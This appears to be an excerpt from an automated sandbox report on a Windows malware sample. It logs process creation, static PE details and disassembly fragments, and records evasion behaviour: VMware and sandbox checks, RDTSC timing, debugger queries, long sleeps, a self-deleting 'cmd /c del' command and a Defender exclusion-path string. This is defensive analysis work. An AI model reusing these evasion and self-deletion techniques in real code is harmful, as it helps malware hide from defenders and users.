          Source: 350969bc_by_Libranalysis.exeReversingLabs: Detection: 36%
          Source: 350969bc_by_Libranalysis.exeString found in binary or memory: &Report-HelpToolStripMenuItem1
          Source: unknownProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 350969bc_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 350969bc_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: 350969bc_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716595208.000000000150F000.00000040.00000001.sdmp, control.exe, 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: 350969bc_by_Libranalysis.exe, control.exe
          Source: Binary string: control.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp
          Source: 350969bc_by_Libranalysis.exeStatic PE information: 0x909C21C3 [Sun Nov 18 10:56:03 2046 UTC]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00410109 push ss; iretd
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004062F9 push ebx; ret
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00406D23 push esi; ret
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0146D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0478D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A62F9 push ebx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B0109 push ss; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB46C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB40B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB402 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A6D23 push esi; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.87688083082
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 350969bc_by_Libranalysis.exe PID: 6988, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000027A85E4 second address: 00000000027A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000027A897E second address: 00000000027A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe TID: 6992Thread sleep time: -100804s >= -30000s
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe TID: 7016Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2928Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 1744Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread delayed: delay time: 100804
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.683720257.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.678766847.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.689009704.000000000FD01000.00000004.00000001.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&v
          Source: explorer.exe, 00000006.00000000.683720257.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.683873602.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.675670351.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.683873602.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000000.683937578.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01453D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01493540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01437D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0149A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
